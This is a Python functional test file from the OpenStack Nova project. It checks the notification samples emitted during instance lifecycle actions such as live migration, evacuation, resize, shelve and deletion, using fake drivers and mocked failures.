d0e9de82c3c634251a9365710a3515ef5c9e5414
|
84724b34b3f1e84dc53cbca5f3660590dbc34a9f
|
/nova/tests/functional/notification_sample_tests/test_instance.py
|
1db77b91ddf295af4cea3138384fc87de2a92cb4
|
[
"Apache-2.0"
] |
permissive
|
openstack/nova
|
2c24b64e3677595611715bae6dda14edd3f90a24
|
065c5906d2da3e2bb6eeb3a7a15d4cd8d98b35e9
|
refs/heads/master
| 2023-08-28T15:10:05.126314
| 2023-08-25T20:31:27
| 2023-08-25T20:31:27
| 790,031
| 2,287
| 2,320
|
Apache-2.0
| 2023-07-08T02:10:29
| 2010-07-22T02:04:27
|
Python
|
UTF-8
|
Python
| false
| false
| 85,580
|
py
|
test_instance.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
from unittest import mock
from nova import exception
from nova.tests import fixtures
from nova.tests.functional.api import client
from nova.tests.functional.notification_sample_tests \
import notification_sample_base
from nova.volume import cinder
class TestInstanceNotificationSampleWithMultipleCompute(
notification_sample_base.NotificationSampleTestBase):
def setUp(self):
self.flags(compute_driver='fake.FakeLiveMigrateDriver')
self.flags(bdms_in_notifications='True', group='notifications')
super(TestInstanceNotificationSampleWithMultipleCompute, self).setUp()
self.neutron = fixtures.NeutronFixture(self)
self.useFixture(self.neutron)
self.cinder = fixtures.CinderFixture(self)
self.useFixture(self.cinder)
self.useFixture(fixtures.AllServicesCurrent())
def test_multiple_compute_actions(self):
# There are not going to be real network-vif-plugged events coming
# so don't wait for them.
self.flags(live_migration_wait_for_vif_plug=False, group='compute')
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._wait_for_notification('instance.create.end')
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
# server will boot on the 'compute' host
self.compute2 = self.start_service('compute', host='host2')
actions = [
(self._test_live_migration_rollback, 'ACTIVE'),
(self._test_live_migration_abort, 'ACTIVE'),
(self._test_live_migration_success, 'ACTIVE'),
(self._test_evacuate_server, 'SHUTOFF'),
(self._test_live_migration_force_complete, 'ACTIVE'),
]
for action, expected_state in actions:
self.notifier.reset()
action(server)
# Ensure that instance is in active state after an action
self._wait_for_state_change(server, expected_state)
@mock.patch('nova.compute.manager.ComputeManager.'
'_live_migration_cleanup_flags', return_value=[True, False])
@mock.patch('nova.compute.rpcapi.ComputeAPI.pre_live_migration',
side_effect=exception.DestinationDiskExists(path='path'))
def _test_live_migration_rollback(self, server, mock_migration,
mock_flags):
post = {
'os-migrateLive': {
'host': 'host2',
'block_migration': True,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_notification(
'instance.live_migration_rollback_dest.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_rollback.start
# 3. instance.live_migration_rollback.end
# 4. instance.live_migration_rollback_dest.start
# 5. instance.live_migration_rollback_dest.end
self.assertEqual(6, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_rollback-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-live_migration_rollback-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-live_migration_rollback_dest-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_rollback_dest-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
def _test_live_migration_success(self, server):
post = {
'os-migrateLive': {
'host': 'host2',
'block_migration': True,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_notification('instance.live_migration_pre.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
self.assertEqual(4, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_pre-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-live_migration_pre-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
migrations = self.admin_api.get_active_migrations(server['id'])
self.assertEqual(1, len(migrations))
self._wait_for_notification('instance.live_migration_post.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
# 4. instance.live_migration_post.start
# 5. instance.live_migration_post_dest.start
# 6. instance.live_migration_post_dest.end
# 7. instance.live_migration_post.end
self.assertEqual(8, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_post-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_post_dest-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
self._verify_notification(
'instance-live_migration_post_dest-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[6])
self._verify_notification(
'instance-live_migration_post-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[7])
def _test_live_migration_abort(self, server):
post = {
"os-migrateLive": {
"host": "host2",
"block_migration": False,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'MIGRATING')
migrations = self._wait_and_get_migrations(server)
self.admin_api.delete_migration(server['id'], migrations[0]['id'])
self._wait_for_notification('instance.live_migration_abort.start')
self._wait_for_state_change(server, 'ACTIVE')
# NOTE(gibi): the instance.live_migration_rollback notification emitted
# after the instance.live_migration_abort notification so we have to
# wait for the rollback to ensure we can assert both notifications
# below
self._wait_for_notification('instance.live_migration_rollback.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
# 4. instance.live_migration_abort.start
# 5. instance.live_migration_abort.end
# 6. instance.live_migration_rollback.start
# 7. instance.live_migration_rollback.end
self.assertEqual(8, len(self.notifier.versioned_notifications),
[x['event_type'] for x in
self.notifier.versioned_notifications])
self._verify_notification(
'instance-live_migration_pre-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-live_migration_pre-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self._verify_notification(
'instance-live_migration_abort-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_abort-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
self._verify_notification(
'instance-live_migration_rollback-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[6])
self._verify_notification(
'instance-live_migration_rollback-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[7])
def _test_evacuate_server(self, server):
services = self.admin_api.get_services(host='host2',
binary='nova-compute')
service_id = services[0]['id']
self.compute2.stop()
self.admin_api.put_service(service_id, {'forced_down': True})
post_args = {
"host": "compute"
}
self._evacuate_server(
server, extra_post_args=post_args, expected_host='compute')
notifications = self._get_notifications('instance.evacuate')
self.assertEqual(1, len(notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-evacuate',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=notifications[0])
self.compute2.start()
self._wait_for_migration_status(server, ['completed'])
self.admin_api.put_service(service_id, {'forced_down': False})
def _test_live_migration_force_complete(self, server):
# In the scenario evacuate happened before which stopped the
# server.
self._start_server(server)
self._wait_for_state_change(server, 'ACTIVE')
self.notifier.reset()
post = {
'os-migrateLive': {
'host': 'host2',
'block_migration': True,
}
}
self.admin_api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'MIGRATING')
migrations = self._wait_and_get_migrations(server)
migration_id = migrations[0]['id']
self.admin_api.force_complete_migration(server['id'], migration_id)
# Note that we wait for instance.live_migration_force_complete.end but
# by the time we check versioned notifications received we could have
# entered ComputeManager._post_live_migration which could emit up to
# four other notifications:
# - instance.live_migration_post.start
# - instance.live_migration_post_dest.start
# - instance.live_migration_post_dest.end
# - instance.live_migration_post.end
# We are not concerned about those in this test so that's why we stop
# once we get instance.live_migration_force_complete.end and assert
# we got at least 6 notifications.
self._wait_for_notification(
'instance.live_migration_force_complete.end')
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance.live_migration_pre.start
# 3. instance.live_migration_pre.end
# 4. instance.live_migration_force_complete.start
# 5. instance.live_migration_force_complete.end
self.assertGreaterEqual(len(self.notifier.versioned_notifications), 6,
self.notifier.versioned_notifications)
self._verify_notification(
'instance-live_migration_force_complete-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[4])
self._verify_notification(
'instance-live_migration_force_complete-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[5])
class TestInstanceNotificationSample(
notification_sample_base.NotificationSampleTestBase):
def setUp(self):
self.flags(bdms_in_notifications='True', group='notifications')
super(TestInstanceNotificationSample, self).setUp()
self.neutron = fixtures.NeutronFixture(self)
self.useFixture(self.neutron)
self.cinder = fixtures.CinderFixture(self)
self.useFixture(self.cinder)
def _wait_until_swap_volume(self, server, volume_id):
for i in range(50):
volume_attachments = self.api.get_server_volumes(server['id'])
if len(volume_attachments) > 0:
for volume_attachment in volume_attachments:
if volume_attachment['volumeId'] == volume_id:
return
time.sleep(0.5)
self.fail('Volume swap operation failed.')
def test_instance_action(self):
# A single test case is used to test most of the instance action
# notifications to avoid booting up an instance for every action
# separately.
# Every instance action test function shall make sure that after the
# function the instance is in active state and usable by other actions.
# Therefore some action especially delete cannot be used here as
# recovering from that action would mean to recreate the instance and
# that would go against the whole purpose of this optimization
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
actions = [
self._test_power_off_on_server,
self._test_restore_server,
self._test_suspend_resume_server,
self._test_pause_unpause_server,
self._test_shelve_and_shelve_offload_server,
self._test_unshelve_server,
self._test_resize_and_revert_server,
self._test_snapshot_server,
self._test_reboot_server,
self._test_reboot_server_error,
self._test_trigger_crash_dump,
self._test_volume_detach_attach_server,
self._test_rescue_unrescue_server,
self._test_soft_delete_server,
self._test_attach_volume_error,
self._test_interface_attach_and_detach,
self._test_interface_attach_error,
self._test_lock_unlock_instance,
self._test_lock_unlock_instance_with_reason,
]
for action in actions:
self.notifier.reset()
action(server)
# Ensure that instance is in active state after an action
self._wait_for_state_change(server, 'ACTIVE')
# if the test step did not raised then we consider the step as
# succeeded. We drop the logs to avoid causing subunit parser
# errors due to logging too much at the end of the test case.
self.stdlog.delete_stored_logs()
def test_create_delete_server(self):
fake_trusted_certs = ['cert-id-1', 'cert-id-2']
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}],
'tags': ['tag'],
'trusted_image_certificates': fake_trusted_certs})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self._delete_server(server)
# NOTE(gibi): The wait_unit_deleted() call polls the REST API to see if
# the instance is disappeared however the _delete_instance() in
# compute/manager destroys the instance first then send the
# instance.delete.end notification. So to avoid race condition the test
# needs to wait for the notification as well here.
self._wait_for_notification('instance.delete.end')
self.assertEqual(9, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
# This list needs to be in order.
expected_notifications = [
'instance-create-start',
'instance-create-end',
'instance-update-tags-action',
'instance-volume_attach-start',
'instance-volume_attach-end',
'instance-delete-start',
'instance-shutdown-start',
'instance-shutdown-end',
'instance-delete-end'
]
for idx, notification in enumerate(expected_notifications):
self._verify_notification(
notification,
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[idx])
@mock.patch('nova.compute.manager.ComputeManager._build_resources')
def test_create_server_error(self, mock_build):
def _build_resources(*args, **kwargs):
raise exception.FlavorDiskTooSmall()
mock_build.side_effect = _build_resources
fake_trusted_certs = ['cert-id-1', 'cert-id-2']
server = self._boot_a_server(
expected_status='ERROR',
extra_params={'networks': [{'port': self.neutron.port_1['id']}],
'tags': ['tag'],
'trusted_image_certificates': fake_trusted_certs})
# 0. scheduler.select_destinations.start
# 1. scheduler.select_destinations.end
# 2. instance-create-start
# 3. instance-create-error
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
tb = self.notifier.versioned_notifications[3]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn('raise exception.FlavorDiskTooSmall()', tb)
self._verify_notification(
'instance-create-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-create-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY},
actual=self.notifier.versioned_notifications[3])
self.notifier.reset()
self._delete_server(server)
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-delete-start_not_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-delete-end_not_scheduled',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
def test_instance_exists_usage_audit(self):
# TODO(xavvior): Should create a functional test for the
# "instance_usage_audit" periodic task. We didn't find usable
# solution for this problem, however we tried to test it in
# several ways.
pass
def test_instance_exists(self):
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
self.notifier.reset()
post = {
'rebuild': {
'imageRef': 'a2459075-d96c-40d5-893e-577ff92e721c',
'metadata': {}
}
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, expected_status='REBUILD')
self._wait_for_state_change(server, expected_status='ACTIVE')
notifications = self._get_notifications('instance.exists')
self._verify_notification(
'instance-exists',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']
},
actual=notifications[0])
def test_delete_server_while_compute_is_down(self):
server = self._boot_a_server(
expected_status='ACTIVE',
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
service_id = self.api.get_service_id('nova-compute')
self.admin_api.put_service_force_down(service_id, True)
self.notifier.reset()
self._delete_server(server)
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-delete-start_compute_down',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-delete-end_compute_down',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.admin_api.put_service_force_down(service_id, False)
def _verify_instance_update_steps(self, steps, notifications,
initial=None):
replacements = {}
if initial:
replacements = initial
for i, step in enumerate(steps):
replacements.update(step)
self._verify_notification(
'instance-update',
replacements=replacements,
actual=notifications[i])
return replacements
def test_create_delete_server_with_instance_update(self):
# This makes server network creation synchronous which is necessary
# for notification samples that expect instance.info_cache.network_info
# to be set.
self.useFixture(fixtures.SpawnIsSynchronousFixture())
self.flags(notify_on_state_change='vm_and_task_state',
group='notifications')
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self._attach_volume_to_server(server, self.cinder.SWAP_OLD_VOL)
instance_updates = self._wait_for_notifications('instance.update', 8)
# The first notification comes from the nova-conductor, the
# eighth notification comes from nova-api the
# rest is from the nova-compute. To keep the test simpler
# assert this fact and then modify the publisher_id of the
# first and eighth notification to match the template
self.assertEqual('nova-conductor:fake-mini',
instance_updates[0]['publisher_id'])
self.assertEqual('nova-api:fake-mini',
instance_updates[7]['publisher_id'])
instance_updates[0]['publisher_id'] = 'nova-compute:fake-mini'
instance_updates[7]['publisher_id'] = 'nova-compute:fake-mini'
create_steps = [
# nothing -> scheduling
{'reservation_id': server['reservation_id'],
'uuid': server['id'],
'host': None,
'node': None,
'state_update.new_task_state': 'scheduling',
'state_update.old_task_state': 'scheduling',
'state_update.state': 'building',
'state_update.old_state': 'building',
'state': 'building'},
# scheduling -> building
{
'state_update.new_task_state': None,
'state_update.old_task_state': 'scheduling',
'task_state': None},
# scheduled
{'host': 'compute',
'node': 'fake-mini',
'state_update.old_task_state': None,
'updated_at': '2012-10-29T13:42:11Z'},
# building -> networking
{'state_update.new_task_state': 'networking',
'state_update.old_task_state': 'networking',
'task_state': 'networking'},
# networking -> block_device_mapping
{'state_update.new_task_state': 'block_device_mapping',
'state_update.old_task_state': 'networking',
'task_state': 'block_device_mapping',
'ip_addresses': [{
"nova_object.name": "IpPayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0",
"nova_object.data": {
"mac": "fa:16:3e:4c:2c:30",
"address": "192.168.1.3",
"port_uuid": "ce531f90-199f-48c0-816c-13e38010b442",
"meta": {},
"version": 4,
"label": "private",
"device_name": "tapce531f90-19"
}}]
},
# block_device_mapping -> spawning
{'state_update.new_task_state': 'spawning',
'state_update.old_task_state': 'block_device_mapping',
'task_state': 'spawning',
},
# spawning -> active
{'state_update.new_task_state': None,
'state_update.old_task_state': 'spawning',
'state_update.state': 'active',
'launched_at': '2012-10-29T13:42:11Z',
'state': 'active',
'task_state': None,
'power_state': 'running'},
# tag added
{'state_update.old_task_state': None,
'state_update.old_state': 'active',
'tags': ['tag1']},
]
replacements = self._verify_instance_update_steps(
create_steps, instance_updates)
self.notifier.reset()
self._delete_server(server)
instance_updates = self._get_notifications('instance.update')
self.assertEqual(2, len(instance_updates),
self.notifier.versioned_notifications)
delete_steps = [
# active -> deleting
{'state_update.new_task_state': 'deleting',
'state_update.old_task_state': 'deleting',
'state_update.old_state': 'active',
'state': 'active',
'task_state': 'deleting',
'tags': ["tag1"],
'block_devices': [{
"nova_object.data": {
"boot_index": None,
"delete_on_termination": False,
"device_name": "/dev/sdb",
"tag": None,
"volume_id": "a07f71dc-8151-4e7d-a0cc-cd24a3f11113"
},
"nova_object.name": "BlockDevicePayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0"
}]
},
# deleting -> deleted
{'state_update.new_task_state': None,
'state_update.old_task_state': 'deleting',
'state_update.old_state': 'active',
'state_update.state': 'deleted',
'state': 'deleted',
'task_state': None,
'terminated_at': '2012-10-29T13:42:11Z',
'ip_addresses': [],
'power_state': 'pending',
'tags': ["tag1"],
'block_devices': [{
"nova_object.data": {
"boot_index": None,
"delete_on_termination": False,
"device_name": "/dev/sdb",
"tag": None,
"volume_id": "a07f71dc-8151-4e7d-a0cc-cd24a3f11113"
},
"nova_object.name": "BlockDevicePayload",
"nova_object.namespace": "nova",
"nova_object.version": "1.0"
}]
},
]
self._verify_instance_update_steps(delete_steps, instance_updates,
initial=replacements)
def _test_power_off_on_server(self, server):
self.api.post_server_action(server['id'], {'os-stop': {}})
self._wait_for_state_change(server, expected_status='SHUTOFF')
self.api.post_server_action(server['id'], {'os-start': {}})
self._wait_for_state_change(server, expected_status='ACTIVE')
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-power_off-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-power_off-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-power_on-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-power_on-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
def _test_shelve_and_shelve_offload_server(self, server):
self.flags(shelved_offload_time=-1)
self.api.post_server_action(server['id'], {'shelve': {}})
self._wait_for_state_change(server, expected_status='SHELVED')
self.assertEqual(3, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-shelve-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-shelve-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self.notifier.reset()
self.api.post_server_action(server['id'], {'shelveOffload': {}})
# we need to wait for the instance.host to become None as well before
# we can unshelve to make sure that the unshelve.start notification
# payload is stable as the compute manager first sets the instance
# state then a bit later sets the instance.host to None.
self._wait_for_server_parameter(server,
{'status': 'SHELVED_OFFLOADED',
'OS-EXT-SRV-ATTR:host': None})
self.assertEqual(2, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-shelve_offload-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-shelve_offload-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self.api.post_server_action(server['id'], {'unshelve': None})
self._wait_for_state_change(server, 'ACTIVE')
self._wait_for_notification('instance.unshelve.end')
def _test_unshelve_server(self, server):
# setting the shelved_offload_time to 0 should set the
# instance status to 'SHELVED_OFFLOADED'
self.flags(shelved_offload_time = 0)
self.api.post_server_action(server['id'], {'shelve': {}})
# we need to wait for the instance.host to become None as well before
# we can unshelve to make sure that the unshelve.start notification
# payload is stable as the compute manager first sets the instance
# state then a bit later sets the instance.host to None.
self._wait_for_server_parameter(server,
{'status': 'SHELVED_OFFLOADED',
'OS-EXT-SRV-ATTR:host': None})
post = {'unshelve': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self._wait_for_notification('instance.unshelve.end')
self.assertEqual(9, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-unshelve-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[7])
self._verify_notification(
'instance-unshelve-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[8])
def _test_suspend_resume_server(self, server):
post = {'suspend': {}}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'SUSPENDED')
post = {'resume': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
# Four versioned notification are generated.
# 0. instance-suspend-start
# 1. instance-suspend-end
# 2. instance-resume-start
# 3. instance-resume-end
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-suspend-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-suspend-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-resume-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-resume-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
self.flags(reclaim_instance_interval=0)
def _test_pause_unpause_server(self, server):
self.api.post_server_action(server['id'], {'pause': {}})
self._wait_for_state_change(server, 'PAUSED')
self.api.post_server_action(server['id'], {'unpause': {}})
self._wait_for_state_change(server, 'ACTIVE')
# Four versioned notifications are generated
# 0. instance-pause-start
# 1. instance-pause-end
# 2. instance-unpause-start
# 3. instance-unpause-end
self.assertEqual(4, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
self._verify_notification(
'instance-pause-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-pause-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
self._verify_notification(
'instance-unpause-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[2])
self._verify_notification(
'instance-unpause-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[3])
def _build_destination_payload(self):
cell1 = self.cell_mappings.get('cell1')
return {
'nova_object.version': '1.0',
'nova_object.namespace': 'nova',
'nova_object.name': 'DestinationPayload',
'nova_object.data': {
'aggregates': None,
'cell': {
'nova_object.version': '2.0',
'nova_object.namespace': 'nova',
'nova_object.name': 'CellMappingPayload',
'nova_object.data': {
'disabled': False,
'name': u'cell1',
'uuid': cell1.uuid
}
}
}
}
def _test_resize_and_revert_server(self, server):
self.flags(allow_resize_to_same_host=True)
other_flavor_body = {
'flavor': {
'name': 'other_flavor',
'ram': 256,
'vcpus': 1,
'disk': 1,
'id': 'd5a8bb54-365a-45ae-abdb-38d249df7845'
}
}
other_flavor_id = self.api.post_flavor(other_flavor_body)['id']
extra_specs = {
"extra_specs": {
"hw:watchdog_action": "reset"}}
self.admin_api.post_extra_spec(other_flavor_id, extra_specs)
# Ignore the create flavor notification
self.notifier.reset()
post = {
'resize': {
'flavorRef': other_flavor_id
}
}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'VERIFY_RESIZE')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'ignore_hosts': [],
'flavor.memory_mb': other_flavor_body['flavor']['ram'],
'flavor.name': other_flavor_body['flavor']['name'],
'flavor.flavorid': other_flavor_id,
'flavor.extra_specs': extra_specs['extra_specs'],
'requested_destination': self._build_destination_payload()})
self.assertEqual(7, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
# ignore instance.exists
self.notifier.versioned_notifications.pop(0)
# This list needs to be in order.
expected_notifications = [
'instance-resize_prep-start',
'instance-resize_prep-end',
'instance-resize-start',
'instance-resize-end',
'instance-resize_finish-start',
'instance-resize_finish-end'
]
for idx, notification in enumerate(expected_notifications):
self._verify_notification(
notification,
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[idx])
self.notifier.reset()
# the following is the revert server request
post = {'revertResize': None}
self.api.post_server_action(server['id'], post)
self._wait_for_state_change(server, 'ACTIVE')
self.assertEqual(3, len(self.notifier.versioned_notifications),
self.notifier.versioned_notifications)
# ignore instance.exists
self.notifier.versioned_notifications.pop(0)
self._verify_notification(
'instance-resize_revert-start',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[0])
self._verify_notification(
'instance-resize_revert-end',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id']},
actual=self.notifier.versioned_notifications[1])
@mock.patch('nova.compute.manager.ComputeManager._prep_resize')
def test_resize_server_error_but_reschedule_was_success(
self, mock_prep_resize):
"""Test it, when the prep_resize method raise an exception,
but the reschedule_resize_or_reraise was successful and
scheduled the resize. In this case we get a notification
about the exception, which caused the prep_resize error.
"""
def _build_resources(*args, **kwargs):
raise exception.FlavorDiskTooSmall()
server = self._boot_a_server(
extra_params={'networks': [{'port': self.neutron.port_1['id']}]})
self.flags(allow_resize_to_same_host=True)
other_flavor_body = {
'flavor': {
'name': 'other_flavor_error',
'ram': 512,
'vcpus': 1,
'disk': 1,
'id': 'a22d5517-147c-4147-a0d1-e698df5cd4e9'
}
}
other_flavor_id = self.api.post_flavor(other_flavor_body)['id']
post = {
'resize': {
'flavorRef': other_flavor_id
}
}
self.notifier.reset()
mock_prep_resize.side_effect = _build_resources
# NOTE(gibi): the first resize_instance call (from the API) should be
# unaffected so that we can reach _prep_resize at all. But the
# subsequent resize_instance call (from _reschedule_resize_or_reraise)
# needs to be mocked as there is no alternative host to resize to.
patcher = mock.patch.object(self.compute.manager.compute_task_api,
'resize_instance')
self.addCleanup(patcher.stop)
patcher.start()
self.api.post_server_action(server['id'], post)
self._wait_for_notification('instance.resize.error')
self._pop_and_verify_dest_select_notification(server['id'],
replacements={
'ignore_hosts': [],
'flavor.name': other_flavor_body['flavor']['name'],
'flavor.flavorid': other_flavor_id,
'flavor.extra_specs': {},
'requested_destination': self._build_destination_payload()})
# 0: instance-exists
# 1: instance-resize_prep-start
# 2: instance-resize-error
# 3: instance-resize_prep-end
self.assertLessEqual(2, len(self.notifier.versioned_notifications),
'Unexpected number of notifications: %s' %
self.notifier.versioned_notifications)
# Note(gibi): There is also an instance.exists notification emitted
# during the rescheduling
tb = self.notifier.versioned_notifications[2]['payload'][
'nova_object.data']['fault']['nova_object.data']['traceback']
self.assertIn("raise exception.FlavorDiskTooSmall()", tb)
self._verify_notification('instance-resize-error',
replacements={
'reservation_id': server['reservation_id'],
'uuid': server['id'],
'fault.traceback': self.ANY
},
actual=self.notifier.versioned_notifications[2])
